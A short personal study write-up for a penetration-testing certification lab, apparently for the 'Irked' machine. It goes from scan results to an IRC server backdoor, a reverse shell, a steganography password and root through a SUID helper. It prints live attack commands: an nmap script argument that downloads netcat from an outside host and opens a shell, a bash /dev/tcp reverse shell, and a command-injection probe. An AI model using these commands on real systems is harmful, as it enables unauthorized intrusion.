OSCP Notes
Comment on page

Irked No.20

Nmap Scan Result:
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33327/tcp6 status
| 100024 1 43906/udp status
| 100024 1 51247/tcp status
|_ 100024 1 56232/udp6 status
port 80 Enum:
apache 2.4.10
Dead end here for now...
I'll do one more dir busting with gobuster
Full nmap scanning shows there's port 8067
it's looking up the host name?
nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh'
echo "AB; ping -c" | nc 8067
tcpdump -i tun1 icmp -v
comfirmed that we can do command execution
echo "AB; bash -c 'bash -i >& /dev/tcp/ 0>&1'" | nc 8067
Explanation: Sometimes, linux may not be in the bash mode, so we told the engine to go to the bash mode with "bash -c" before executing the command"
got a reverse shell:
found a djmardov directory.
do find . -ls -type f
shows only files in the current directory.
back up file.
We only saw one picture, which was this img.

Extracting password from an img file with steghide

steghide extract -sf Desktop/irked.jpg -p UPupDOWNdownLRlrBAbaSSss
I was able to ssh into the user with the pass found.
wget -r > LinEnum.sh
Ran LinPeas.sh
Now let's transfer the file over to kali and analyze it.
  1. 1.
    base64 -w0 /usr/bin/viewuser this will encode the file into base64. -w0 eliminates line wrapping.
  2. 2.
    base64 textfile.txt --decode
  3. 3.
    use "ltrace" to analyze it.
executing /tmp/listusers
if we replace this file with a shell, we can get a root.
replaced the content with
ran the viewuser app
Now we are in root